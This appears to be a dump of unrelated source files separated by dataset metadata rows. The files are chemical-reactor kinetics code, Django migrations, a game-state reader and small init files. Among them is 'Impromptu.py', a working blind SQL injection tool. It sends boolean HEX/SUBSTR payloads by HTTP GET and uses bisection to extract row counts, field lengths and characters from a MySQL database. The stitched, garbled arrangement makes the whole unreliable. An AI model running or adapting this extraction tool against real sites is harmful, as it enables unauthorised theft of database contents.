_convectiveTerm = -1*v_z_DiLeVa*GaDe_DiLeVa*GaCpMeanMix_DiLeVa*dTdz
# central difference
# d2Tdz2 = (T_b - 2*T_c + T_f)/(dz**2)
# dispersion flux [kJ/m^3.s]
# _dispersionFluxT = (GaThCoEff*d2Tdz2)*1e-3
_dispersionFluxT = ((1/PeNuHe0)*GaThCoEff_DiLeVa*d2Tdz2)*1
# temperature at the catalyst surface [K]
# Ts_cat
# inward flux from catalyst surface to gas [kJ/m^2.s]
_inwardFluxT = HeTrCo*SpSuAr*Tf*(Ts_r_cat_gas - T_c)*1e-3
# total heat transfer between gas and solid [kJ/m^3.s]
_heTrBeGaSoTerm = (1/GaHeCoTe0)*_inwardFluxT
# heat exchange term [kJ/m^3.s] -> [no unit]
_heatExchangeTerm = (1/GaHeCoTe0)*Qm
# convective flux, diffusive flux, enthalpy of reaction, cooling heat
# steady-state
dxdt_T = _convectiveTerm + _dispersionFluxT + _heTrBeGaSoTerm + _heatExchangeTerm
dxdtMat[indexT][0][z] = dxdt_T
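# NOTE (editor sketch): the matching dimensionless gas-phase energy balance is
#   dT*/dt* = -v* GaDe* GaCpMeanMix* dT*/dz* + (GaThCoEff*/PeNuHe0) d2T*/dz*2
#             + (1/GaHeCoTe0)*(HeTrCo*SpSuAr*Tf*(Ts* - T*)*1e-3 + Qm)
# i.e. the _convectiveTerm, _dispersionFluxT, _heTrBeGaSoTerm and
# _heatExchangeTerm contributions summed above.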
# dC/dt list
# convert
# solid thermal conductivity - [J/s.m.K] => [kJ/s.m.K]
SoThCoEff_Conv = CaPo*SoThCoMix0/1000
# overall heat of reaction - OvHeReT [kJ/m^3.s]
OvHeReT_Conv = -1*OvHeReT
# heat transfer coefficient - HeTrCo [J/m^2.s.K] => [kJ/m^2.s.K]
HeTrCo_Conv = HeTrCo/1000
# loop vars
_alpha = rf/SoThCoEff_Conv
_beta = -1*HeTrCo_Conv/SoThCoEff_DiLeVa
_DiLe = _alpha*_beta
_H = (1-BeVoFr)*OvHeReT_Conv
# set
dxdtMat[indexT][1][z] = _H - _inwardFluxT
# NOTE
# flat
dxdt = dxdtMat.flatten().tolist()
return dxdt
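# NOTE (editor sketch): downstream code receives dxdt as this flat list; to
# recover the per-variable layout one can reshape it back, assuming
# indexT == compNo so that dxdtMat has shape (compNo + 1, 2, zNo):
#   dxdt_back = np.asarray(dxdt).reshape((compNo + 1, 2, zNo))
#   dxdt_back[i, 0, z]      -> gas-phase species balance i at node z
#   dxdt_back[indexT, 0, z] -> gas-phase energy balance at node z
#   dxdt_back[:, 1, z]      -> the corresponding solid-phase balances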
# FIXME
def modelReactions(P, T, y, CaBeDe):
'''
reaction rate expression list [kmol/m^3.s]
args:
P: pressure [Pa]
T: temperature [K]
y: mole fraction
CaBeDe: catalyst bed density [kgcat/m^3 bed or particle]
output:
r: reaction rate at T,P [kmol/m^3.s]
'''
try:
# pressure [Pa]
# temperature [K]
# print("y", y)
# parameters
RT = CONST.R_CONST*T
# kinetic constant
# DME production
# [kmol/kgcat.s.bar2]
K1 = 35.45*MATH.exp(-1.7069e4/RT)
# [kmol/kgcat.s.bar]
K2 = 7.3976*MATH.exp(-2.0436e4/RT)
# [kmol/kgcat.s.bar]
K3 = 8.2894e4*MATH.exp(-5.2940e4/RT)
# adsorption constant [1/bar]
KH2 = 0.249*MATH.exp(3.4394e4/RT)
KCO2 = 1.02e-7*MATH.exp(6.74e4/RT)
KCO = 7.99e-7*MATH.exp(5.81e4/RT)
# equilibrium constant
Ln_KP1 = 4213/T - 5.752 * \
MATH.log(T) - 1.707e-3*T + 2.682e-6 * \
(MATH.pow(T, 2)) - 7.232e-10*(MATH.pow(T, 3)) + 17.6
KP1 = MATH.exp(Ln_KP1)
log_KP2 = 2167/T - 0.5194 * \
MATH.log10(T) + 1.037e-3*T - 2.331e-7*(MATH.pow(T, 2)) - 1.2777
KP2 = MATH.pow(10, log_KP2)
Ln_KP3 = 4019/T + 3.707 * \
MATH.log(T) - 2.783e-3*T + 3.8e-7 * \
(MATH.pow(T, 2)) - 6.56e-4/(MATH.pow(T, 3)) - 26.64
KP3 = MATH.exp(Ln_KP3)
# total concentration
# Ct = y(1) + y(2) + y(3) + y(4) + y(5) + y(6);
# mole fraction
yi_H2 = y[0]
yi_CO2 = y[1]
yi_H2O = y[2]
yi_CO = y[3]
yi_CH3OH = y[4]
yi_DME = y[5]
# partial pressure of H2 [bar]
PH2 = P*(yi_H2)*1e-5
# partial pressure of CO2 [bar]
PCO2 = P*(yi_CO2)*1e-5
# partial pressure of H2O [bar]
PH2O = P*(yi_H2O)*1e-5
# partial pressure of CO [bar]
PCO = P*(yi_CO)*1e-5
# partial pressure of CH3OH [bar]
PCH3OH = P*(yi_CH3OH)*1e-5
# partial pressure of CH3OCH3 [bar]
PCH3OCH3 = P*(yi_DME)*1e-5
# reaction rate expression [kmol/m3.s]
ra1 = PCO2*PH2
ra2 = 1 + (KCO2*PCO2) + (KCO*PCO) + MATH.sqrt(KH2*PH2)
ra3 = (1/KP1)*((PH2O*PCH3OH)/(PCO2*(MATH.pow(PH2, 3))))
r1 = K1*(ra1/(MATH.pow(ra2, 3)))*(1-ra3)*CaBeDe
ra4 = PH2O - (1/KP2)*((PCO2*PH2)/PCO)
r2 = K2*(1/ra2)*ra4*CaBeDe
ra5 = (MATH.pow(PCH3OH, 2)/PH2O)-(PCH3OCH3/KP3)
r3 = K3*ra5*CaBeDe
# result
# r = roundNum([r1, r2, r3], REACTION_RATE_ACCURACY)
r = [r1, r2, r3]
return r
except Exception as e:
print(e)
raise
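# NOTE (editor sketch): an illustrative call of modelReactions, assuming it is
# reachable from the enclosing scope; all numbers are placeholders, not data
# taken from this model:
#   P_demo = 50e5                                  # pressure [Pa]
#   T_demo = 523.15                                # temperature [K]
#   y_demo = [0.60, 0.20, 0.02, 0.10, 0.05, 0.03]  # [H2, CO2, H2O, CO, CH3OH, DME]
#   r1, r2, r3 = modelReactions(P_demo, T_demo, y_demo, CaBeDe=1171.2)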
| 36.068854
| 153
| 0.509205
| 32,970
| 322,167
| 4.884804
| 0.032575
| 0.00529
| 0.007339
| 0.00991
| 0.931594
| 0.919337
| 0.914065
| 0.907738
| 0.900219
| 0.893469
| 0
| 0.026659
| 0.391176
| 322,167
| 8,931
| 154
| 36.072892
| 0.794436
| 0.321616
| 0
| 0.882618
| 0
| 0.001325
| 0.051436
| 0.000401
| 0
| 0
| 0
| 0.001568
| 0
| 1
| 0.005564
| false
| 0
| 0.007154
| 0
| 0.018548
| 0.002915
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80a47af68f0509773d0846c9a45a5dff6469e34a
| 88
|
py
|
Python
|
uvi-bot/tests/__init__.py
|
cloudsecurityalliance/uvi-tools
|
58aa6c2bda890bd5e20d4f6025e7af55390b8bcd
|
[
"Apache-2.0"
] | 4
|
2021-08-22T02:50:56.000Z
|
2021-11-15T23:41:17.000Z
|
uvi-bot/tests/__init__.py
|
cloudsecurityalliance/uvi-tools
|
58aa6c2bda890bd5e20d4f6025e7af55390b8bcd
|
[
"Apache-2.0"
] | 2
|
2021-08-28T22:47:20.000Z
|
2021-08-30T03:37:42.000Z
|
uvi-bot/tests/__init__.py
|
cloudsecurityalliance/uvi-tools
|
58aa6c2bda890bd5e20d4f6025e7af55390b8bcd
|
[
"Apache-2.0"
] | 3
|
2021-06-30T00:58:08.000Z
|
2021-10-19T22:15:19.000Z
|
from .test_UVIRepo import *
from .test_UVIGithub import *
from .test_UVIIssue import *
| 17.6
| 29
| 0.784091
| 12
| 88
| 5.5
| 0.5
| 0.363636
| 0.424242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147727
| 88
| 4
| 30
| 22
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
03e81c30b60e74cb3d1008e129853793433c915b
| 2,320
|
py
|
Python
|
awx/main/migrations/0094_v360_webhook_mixin2.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 11,396
|
2017-09-07T04:56:02.000Z
|
2022-03-31T13:56:17.000Z
|
awx/main/migrations/0094_v360_webhook_mixin2.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 11,046
|
2017-09-07T09:30:46.000Z
|
2022-03-31T20:28:01.000Z
|
awx/main/migrations/0094_v360_webhook_mixin2.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 3,592
|
2017-09-07T04:14:31.000Z
|
2022-03-31T23:53:09.000Z
|
# Generated by Django 2.2.4 on 2019-09-12 14:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main', '0093_v360_personal_access_tokens'),
]
operations = [
migrations.AddField(
model_name='job',
name='webhook_credential',
field=models.ForeignKey(
blank=True,
help_text='Personal Access Token for posting back the status to the service API',
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name='jobs',
to='main.Credential',
),
),
migrations.AddField(
model_name='job',
name='webhook_guid',
field=models.CharField(blank=True, help_text='Unique identifier of the event that triggered this webhook', max_length=128),
),
migrations.AddField(
model_name='job',
name='webhook_service',
field=models.CharField(
blank=True, choices=[('github', 'GitHub'), ('gitlab', 'GitLab')], help_text='Service that webhook requests will be accepted from', max_length=16
),
),
migrations.AddField(
model_name='workflowjob',
name='webhook_credential',
field=models.ForeignKey(
blank=True,
help_text='Personal Access Token for posting back the status to the service API',
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name='workflowjobs',
to='main.Credential',
),
),
migrations.AddField(
model_name='workflowjob',
name='webhook_guid',
field=models.CharField(blank=True, help_text='Unique identifier of the event that triggered this webhook', max_length=128),
),
migrations.AddField(
model_name='workflowjob',
name='webhook_service',
field=models.CharField(
blank=True, choices=[('github', 'GitHub'), ('gitlab', 'GitLab')], help_text='Service that webhook requests will be accepted from', max_length=16
),
),
]
| 36.825397
| 160
| 0.569397
| 237
| 2,320
| 5.438819
| 0.316456
| 0.083786
| 0.10706
| 0.125679
| 0.845617
| 0.845617
| 0.845617
| 0.704422
| 0.704422
| 0.704422
| 0
| 0.02046
| 0.325862
| 2,320
| 62
| 161
| 37.419355
| 0.803708
| 0.019397
| 0
| 0.821429
| 1
| 0
| 0.271007
| 0.014078
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035714
| 0
| 0.089286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ff1f579e53077042cf2c9ca68cde2e7c192e90a0
| 77
|
py
|
Python
|
envs/walkers/__init__.py
|
WyomingWolf/rl_bot
|
6d462cd62a4c8f00c30f9d89bed34d2e583544b9
|
[
"MIT"
] | null | null | null |
envs/walkers/__init__.py
|
WyomingWolf/rl_bot
|
6d462cd62a4c8f00c30f9d89bed34d2e583544b9
|
[
"MIT"
] | null | null | null |
envs/walkers/__init__.py
|
WyomingWolf/rl_bot
|
6d462cd62a4c8f00c30f9d89bed34d2e583544b9
|
[
"MIT"
] | null | null | null |
from envs.walkers.bot_env import BotEnv
from envs.walkers.ant import AntEnv
| 19.25
| 39
| 0.831169
| 13
| 77
| 4.846154
| 0.692308
| 0.253968
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116883
| 77
| 3
| 40
| 25.666667
| 0.926471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
205dc52c53cea390ba2508a60f8059a05fb81d85
| 8,411
|
py
|
Python
|
classes/Impromptu.py
|
Sys-A501/MySQL-Impromptu
|
7a8b9a2c6af14385e4a16f5f7773c5915dd7f66c
|
[
"MIT"
] | null | null | null |
classes/Impromptu.py
|
Sys-A501/MySQL-Impromptu
|
7a8b9a2c6af14385e4a16f5f7773c5915dd7f66c
|
[
"MIT"
] | null | null | null |
classes/Impromptu.py
|
Sys-A501/MySQL-Impromptu
|
7a8b9a2c6af14385e4a16f5f7773c5915dd7f66c
|
[
"MIT"
] | 1
|
2020-03-11T09:52:31.000Z
|
2020-03-11T09:52:31.000Z
|
import httplib
class Impromptu(object):
def __init__(self):
pass
###########################################################
# Returns true if the position contains the selected char #
###########################################################
def getChar(self, server, https, path, rNum, cNum, char, fieldName, table, evl, txtEval, queryComments = '', rLimit = True):
payload = "+AND+(SELECT+HEX(SUBSTR("+fieldName+","+str(cNum)+",1))+FROM+"+table
if rLimit:
payload += "+LIMIT+"+str(rNum)+",1"
pass #END if
payload += ")=HEX("+hex(ord(char))+")"
payload += queryComments
req = path+payload
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
conn.request('GET', req)
response = conn.getresponse()
text = response.read()
#print char+" = "+str(txtEval in text)
return (txtEval in text) == evl
pass #END function
######################################################
# Returns the selected position char using bisection #
######################################################
def getChar_bj(self, server, https, path, rNum, cNum, fieldName, table, evl, txtEval, queryComments = '', rLimit = True):
# - Printable chars only
maxVal = 127
minVal = 31
rVal = 0
while maxVal != minVal: # turnning around
tmpVal = minVal+((maxVal-minVal)/2)
#print "\n"+str(minVal)+", "+str(maxVal)
if tmpVal != minVal:
if self.testChar(server, https, path, rNum, cNum, tmpVal, fieldName, table, evl, txtEval, queryComments, rLimit):
minVal = tmpVal
pass
else:
maxVal = tmpVal
pass #END if
pass
else:
rVal = maxVal
break
pass #END if
pass #END while
return chr(rVal)
pass #END function
## - (bisection implementation) - ##################################
# Test whether the value is greater than the selected char; return the result #
####################################################################
def testChar(self, server, https, path, rNum, cNum, char, fieldName, table, evl, txtEval, queryComments, rLimit):
#print chr(char)
payload = "+AND+(SELECT+HEX(SUBSTR("+fieldName+","+str(cNum)+",1))+FROM+"+table
if rLimit:
payload += "+LIMIT+"+str(rNum)+",1"
pass #END if
payload += ")>HEX("+str(char)+")"
payload += queryComments
req = path+payload
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
conn.request('GET', req)
response = conn.getresponse()
text = response.read()
#print str(char)+" = "+str(txtEval in text)
return (txtEval in text) == evl
pass
#############################
# Returns a row char length #
#############################
def getLength(server, https, path, rNum, fieldName, table, evl, txtEval, queryComments = '', rLimit = True):
if evl:
text = txtEval
pass #END if
count = 0;
while ((txtEval in text) == evl):
count += 1
payload = "+AND+(SELECT+LENGTH("+fieldName+")+FROM+"+table
if rLimit:
payload += "+LIMIT+"+str(rNum)+",1"
pass #END if
payload += ")>"+str(count)
payload += queryComments
req = path+payload
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
conn.request('GET', req)
response = conn.getresponse()
text = response.read()
#print text+" --> \n"+str((txtEval in text))
pass #END while
return count
pass #END function
#############################################
# Returns a row char length using bisection #
#############################################
def getLength_bj(self, server, https, path, rNum, fieldName, table, evl, txtEval, queryComments = '', rLimit = True):
rVal = 0;
if self.testRowLength (server, https, path, rNum, fieldName, table, evl, txtEval, queryComments, rLimit, 0) == False: # Testing if numRows =< 0
rVal = 0
pass
else:
initVal = 1
while self.testRowLength (server, https, path, rNum, fieldName, table, evl, txtEval, queryComments, rLimit, initVal): # Getting an upper limit
initVal *= 10
pass #END while
maxVal = initVal
minVal = 1
rVal = 1
if initVal != 1:
while maxVal != minVal: # turnning around
tmpVal = minVal+((maxVal-minVal)/2)
#print "\n"+str(minVal)+", "+str(maxVal)
if tmpVal != minVal:
if self.testRowLength (server, https, path, rNum, fieldName, table, evl, txtEval, queryComments, rLimit, tmpVal):
minVal = tmpVal
pass
else:
maxVal = tmpVal
pass #END if
pass
else:
rVal = maxVal
break
pass
pass #END while
pass #END if
pass #END if
return rVal
pass #END function
## - (bisection implementation) - ########################################
# Test whether the value is greater than the row char length and return the result #
##########################################################################
def testRowLength (self, server, https, path, rNum, fieldName, table, evl, txtEval, queryComments, rLimit, count = 0):
if evl:
text = txtEval
pass #END if
payload = "+AND+(SELECT+LENGTH("+fieldName+")+FROM+"+table
if rLimit:
payload += "+LIMIT+"+str(rNum)+",1"
pass #END if
payload += ")>"+str(count)
payload += queryComments
req = path+payload
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
conn.connect();
conn.request('GET', req)
#print req
response = conn.getresponse()
text = response.read()
return ((txtEval in text) == evl)
pass #END fucntion
#######################
# Returns the number of rows #
#######################
def getRowsNum(server, https, path, fieldName, table, evl, txtEval, queryComments = ''):
print "Counting '"+fieldName+"' rows"
if evl:
text = txtEval
pass #END if
count = 0;
while ((txtEval in text) == evl):
payload = "+AND+(SELECT+COUNT("+fieldName+")+FROM+"+table+")+>+"+str(count)
payload += queryComments
print count,
req = path+payload
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
conn.connect();
##print req
conn.request('GET', req)
response = conn.getresponse()
text = response.read()
#print text+" --> \n"+str((txtEval in text))
count += 1
pass #END while
return count-1
pass #END function
#######################################
# Returns the number of rows using bisection #
#######################################
def getRowsNum_bj(self, server, https, path, fieldName, table, evl, txtEval, queryComments):
print "Counting '"+fieldName+"' rows"
rVal = 0;
if self.testRowNum (server, https, path, fieldName, table, evl, txtEval, queryComments, 0) == False: # Testing if numRows =< 0
rVal = 0
pass
else:
initVal = 1
while self.testRowNum (server, https, path, fieldName, table, evl, txtEval, queryComments, initVal): # Getting an upper limit
initVal *= 10
pass #END while
maxVal = initVal
minVal = 1
rVal = 1
if initVal != 1:
while maxVal != minVal: # turnning around
tmpVal = minVal+((maxVal-minVal)/2)
print "\n"+str(minVal)+", "+str(maxVal)
if tmpVal != minVal:
if self.testRowNum (server, https, path, fieldName, table, evl, txtEval, queryComments, tmpVal):
minVal = tmpVal
pass
else:
maxVal = tmpVal
pass #END if
pass
else:
rVal = maxVal
break
pass
pass #END while
pass #END if
pass #END if
return rVal
pass #END function
## - (bisection implementation) - ###################################
# Test whether the value is greater than the row count and return the result #
#####################################################################
def testRowNum (self, server, https, path, fieldName, table, evl, txtEval, queryComments = '', count = 0):
if evl:
text = txtEval
pass #END if
payload = "+AND+(SELECT+COUNT("+fieldName+")+FROM+"+table+")+>+"+str(count)
payload += queryComments
print count,
req = path+payload
#print req
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
#print req
conn.connect();
conn.request('GET', req)
response = conn.getresponse()
text = response.read()
#print text
return ((txtEval in text) == evl)
pass #END function
| 27.132258
| 145
| 0.575199
| 942
| 8,411
| 5.12845
| 0.112527
| 0.044918
| 0.049679
| 0.079487
| 0.890292
| 0.855723
| 0.83461
| 0.809356
| 0.809356
| 0.787001
| 0
| 0.006293
| 0.206515
| 8,411
| 309
| 146
| 27.220065
| 0.717561
| 0.190584
| 0
| 0.861538
| 0
| 0
| 0.049584
| 0.008151
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.220513
| 0.005128
| null | null | 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
205e93ae915d840145a7b88d4c7b5ef0660208a2
| 4,309
|
py
|
Python
|
read_input.py
|
NeiH2304/ProCon_ver_4
|
a51604bc8b1510971d981a1d0f06b9d3ff8494aa
|
[
"MIT"
] | null | null | null |
read_input.py
|
NeiH2304/ProCon_ver_4
|
a51604bc8b1510971d981a1d0f06b9d3ff8494aa
|
[
"MIT"
] | null | null | null |
read_input.py
|
NeiH2304/ProCon_ver_4
|
a51604bc8b1510971d981a1d0f06b9d3ff8494aa
|
[
"MIT"
] | null | null | null |
def read_state(file_name):
MAX_SIZE = 20
data = []
with open(file_name) as f:
score_matrix = []
h, w = map(int, f.readline().split())
for i in range(h):
array = list(map(int, f.readline().split()))
while(len(array) < MAX_SIZE):
array.append(0)
score_matrix.append(array)
while(len(score_matrix) < MAX_SIZE):
score_matrix.append([0] * MAX_SIZE)
num_tresures = list(map(int, f.readline().split()))[0]
treasures = []
for j in range(num_tresures):
coord = list(map(int, f.readline().split()))
treasures.append(coord)
num_walls = list(map(int, f.readline().split()))[0]
coord_walls = []
for j in range(num_walls):
coord = list(map(int, f.readline().split()))
coord_walls.append(coord)
num_agens = list(map(int, f.readline().split()))[0]
coord_agens_of_team_A = []
coord_agens_of_team_B = []
for j in range(num_agens * 2):
coord = list(map(int, f.readline().split()))
# print(coord)
if(j < num_agens):
coord_agens_of_team_A.append(coord)
else:
coord_agens_of_team_B.append(coord)
conquer_matrix_1 = []
for i in range(h):
array = list(map(int, f.readline().split()))
while(len(array) < MAX_SIZE):
array.append(0)
conquer_matrix_1.append(array)
while(len(conquer_matrix_1) < MAX_SIZE):
conquer_matrix_1.append([0] * MAX_SIZE)
conquer_matrix_2 = []
for i in range(h):
array = list(map(int, f.readline().split()))
while(len(array) < MAX_SIZE):
array.append(0)
conquer_matrix_2.append(array)
while(len(conquer_matrix_2) < MAX_SIZE):
conquer_matrix_2.append([0] * MAX_SIZE)
turns = list(map(int, f.readline().split()))[0]
data = [h, w, score_matrix, treasures, coord_walls,
coord_agens_of_team_A, coord_agens_of_team_B,
[conquer_matrix_1, conquer_matrix_2], turns, num_agens]
return data
class Data():
def Read_Input(num_inputs = 1):
MAX_SIZE = 20
data = []
for i in range(num_inputs):
file_name = 'Input_File/inp_file_' + str(i) + '.txt'
with open(file_name) as f:
score_matrix = []
h, w = map(int, f.readline().split())
for i in range(h):
array = list(map(int, f.readline().split()))
while(len(array) < MAX_SIZE):
array.append(0)
score_matrix.append(array)
while(len(score_matrix) < MAX_SIZE):
score_matrix.append([0] * MAX_SIZE)
turns = list(map(int, f.readline().split()))[0]
num_agens = list(map(int, f.readline().split()))[0]
coord_agens_of_team_A = []
coord_agens_of_team_B = []
for j in range(num_agens * 2):
coord = list(map(int, f.readline().split()))
# print(coord)
if(j < num_agens):
coord_agens_of_team_A.append(coord)
else:
coord_agens_of_team_B.append(coord)
num_tresures = list(map(int, f.readline().split()))[0]
treasures = []
for j in range(num_tresures):
coord = list(map(int, f.readline().split()))
treasures.append(coord)
num_walls = list(map(int, f.readline().split()))[0]
coord_walls = []
for j in range(num_walls):
coord = list(map(int, f.readline().split()))
coord_walls.append(coord)
data.append([h, w, score_matrix, coord_agens_of_team_A,
coord_agens_of_team_B, treasures,
coord_walls, turns])
return data
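# NOTE (editor sketch): minimal usage of read_state, assuming an input file in
# the format parsed above exists; the path below is only a placeholder.
if __name__ == '__main__':
    state = read_state('Input_File/inp_file_0.txt')
    h, w = state[0], state[1]
    print('board:', h, 'x', w, '| turns:', state[8], '| agents per team:', state[9])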
| 38.81982
| 71
| 0.489209
| 505
| 4,309
| 3.928713
| 0.110891
| 0.060484
| 0.070565
| 0.15121
| 0.839718
| 0.818548
| 0.78629
| 0.78629
| 0.78629
| 0.78629
| 0
| 0.012543
| 0.389418
| 4,309
| 111
| 72
| 38.81982
| 0.741543
| 0.005802
| 0
| 0.795699
| 0
| 0
| 0.005606
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021505
| false
| 0
| 0
| 0
| 0.053763
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
207948408ed8442b3a3b2c01e30db44bc89a5789
| 161
|
py
|
Python
|
django_plus/cookie/__init__.py
|
BE360/django-plus
|
4bd09e2636391fb325da2a5dc5ec87e9280a1318
|
[
"MIT"
] | 1
|
2019-09-25T06:48:14.000Z
|
2019-09-25T06:48:14.000Z
|
django_plus/cookie/__init__.py
|
BE360/django-plus
|
4bd09e2636391fb325da2a5dc5ec87e9280a1318
|
[
"MIT"
] | null | null | null |
django_plus/cookie/__init__.py
|
BE360/django-plus
|
4bd09e2636391fb325da2a5dc5ec87e9280a1318
|
[
"MIT"
] | 1
|
2019-04-22T11:49:16.000Z
|
2019-04-22T11:49:16.000Z
|
from django_plus.cookie import cookie_classes
from .cookie_param import CookieParam
from django_plus.cookie import utils
from .manager import get_cookie_handler
| 32.2
| 45
| 0.875776
| 24
| 161
| 5.625
| 0.5
| 0.148148
| 0.207407
| 0.296296
| 0.385185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099379
| 161
| 4
| 46
| 40.25
| 0.931034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2097b7aedd83686ed88baf4500966ec9d0f210e3
| 3,147
|
py
|
Python
|
cmsplugin_ss_grid/migrations/0002_auto_20171211_1043.py
|
alexjbartlett/cmsplugin_ss_grid
|
a377383107c0b71cf98c46229b6044a338dfd88f
|
[
"MIT"
] | null | null | null |
cmsplugin_ss_grid/migrations/0002_auto_20171211_1043.py
|
alexjbartlett/cmsplugin_ss_grid
|
a377383107c0b71cf98c46229b6044a338dfd88f
|
[
"MIT"
] | null | null | null |
cmsplugin_ss_grid/migrations/0002_auto_20171211_1043.py
|
alexjbartlett/cmsplugin_ss_grid
|
a377383107c0b71cf98c46229b6044a338dfd88f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-12-11 10:43
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cmsplugin_ss_grid', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='container',
name='background_id',
field=models.CharField(blank=True, help_text='ID applied to the background HTML element', max_length=255, null=True, verbose_name='Background ID'),
),
migrations.AddField(
model_name='container',
name='padding_bottom',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Bottom'),
),
migrations.AddField(
model_name='container',
name='padding_left',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Left'),
),
migrations.AddField(
model_name='container',
name='padding_right',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Right'),
),
migrations.AddField(
model_name='container',
name='padding_top',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Top'),
),
migrations.AddField(
model_name='containercell',
name='margin_bottom',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Margin Bottom'),
),
migrations.AddField(
model_name='containercell',
name='margin_left',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Margin Left'),
),
migrations.AddField(
model_name='containercell',
name='margin_right',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Margin Right'),
),
migrations.AddField(
model_name='containercell',
name='margin_top',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Margin Top'),
),
migrations.AddField(
model_name='containercell',
name='padding_bottom',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Bottom'),
),
migrations.AddField(
model_name='containercell',
name='padding_left',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Left'),
),
migrations.AddField(
model_name='containercell',
name='padding_right',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Right'),
),
migrations.AddField(
model_name='containercell',
name='padding_top',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Top'),
),
]
| 38.851852
| 159
| 0.605974
| 332
| 3,147
| 5.560241
| 0.183735
| 0.095341
| 0.161972
| 0.190141
| 0.843445
| 0.827736
| 0.806067
| 0.611051
| 0.611051
| 0.611051
| 0
| 0.021016
| 0.274229
| 3,147
| 80
| 160
| 39.3375
| 0.787215
| 0.021608
| 0
| 0.753425
| 1
| 0
| 0.174577
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027397
| 0
| 0.068493
| 0
| 0
| 0
